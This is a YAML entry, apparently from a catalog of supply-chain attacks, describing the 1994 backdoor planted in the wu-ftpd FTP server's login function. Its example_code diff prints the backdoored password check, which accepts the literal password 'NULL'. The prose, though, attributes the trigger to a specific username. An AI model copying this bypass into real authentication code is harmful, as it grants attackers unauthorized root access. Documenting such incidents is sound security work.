- name: "wuftpd"
  title: "wuftpd backdoored before distribution"
  start_date: 1994-01-01
  end_date: 1994-04-07
  license: "BSD"
  website: "https://www.wu-ftpd.org/"
  repo: "https://github.com/JetBrains/wu-ftpd"
  attribution_type: "unknown"
  component_type: "Application"
  lang: "C"
  cause: "compromise"
  motive: "backdoor"
  attack_vector: "source modification"
  insertion_phase: "distribution"
  impact_type: "backdoor"
  synopsis: "The Washington University FTP daemon was distributed with a backdoor in the login function. The backdoor allowed unauthorized root access to systems running the compromised version."
  compromise_desc: "An unknown attacker modified the source code of wuftpd to include a backdoor in the login function. When a user attempted to log in with a specific username, the system would grant root access regardless of the password provided. The backdoor was designed to be difficult to detect during source code inspection."
  impact_desc: "The backdoor allowed attackers to gain root-level access to any system running the compromised version of wuftpd. As wuftpd was one of the most widely used FTP servers in the mid-1990s, particularly on Unix systems, the potential impact was significant. The exact number of compromised systems is unknown, but the backdoor existed in the wild for several months before being detected."
  references:
    - https://insights.sei.cmu.edu/documents/517/1994_019_001_496252.pdf
  versions:
    - 2.2
    - 2.1f
  example_code: |
    < if ((pw == NULL || *pw->pw_passwd == '\0' ||
    < strcmp(xpasswd, pw->pw_passwd)) &&
    < (strcmp(passwd, "NULL"))) {
    - ---
    < if (pw == NULL || *pw->pw_passwd == '\0' ||
    < strcmp(xpasswd, pw->pw_passwd)) {
